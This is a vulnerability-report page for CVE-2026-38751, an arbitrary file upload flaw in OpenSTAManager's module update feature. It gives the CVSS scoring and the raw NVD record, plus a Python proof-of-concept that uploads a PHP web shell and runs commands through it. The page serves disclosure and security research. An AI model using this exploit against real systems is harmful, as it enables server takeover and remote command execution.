Security Vulnerability Report
中文
CVE-2026-38751 CVSS 7.2 HIGH

CVE-2026-38751

Published: 2026-05-04 19:16:04
Last Modified: 2026-05-07 15:53:50

Description

OpenSTAManager version 2.10 and earlier contains an arbitrary file upload vulnerability in the module update functionality (modules/aggiornamenti/upload_modules.php)

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

OpenSTAManager <= 2.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(url, session_cookie): """ PoC for CVE-2026-38751: Arbitrary File Upload """ upload_url = f"{url}/modules/aggiornamenti/upload_modules.php" # Prepare the malicious PHP file payload files = { 'module_file': ('exploit.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php') } # Cookies for high privilege authentication cookies = {'PHPSESSID': session_cookie} try: response = requests.post(upload_url, files=files, cookies=cookies) if response.status_code == 200: print(f"[+] File uploaded. Check: {url}/uploads/exploit.php?cmd=whoami") else: print("[-] Upload failed.") except Exception as e: print(f"Error: {e}") # Usage # exploit('http://target', 'your_session_id')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38751", "sourceIdentifier": "[email protected]", "published": "2026-05-04T19:16:03.613", "lastModified": "2026-05-07T15:53:49.717", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenSTAManager version 2.10 and earlier contains an arbitrary file upload vulnerability in the module update functionality (modules/aggiornamenti/upload_modules.php)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://github.com/devcode-it/openstamanager", "source": "[email protected]"}, {"url": "https://github.com/fuutianyii/poc", "source": "[email protected]"}]}}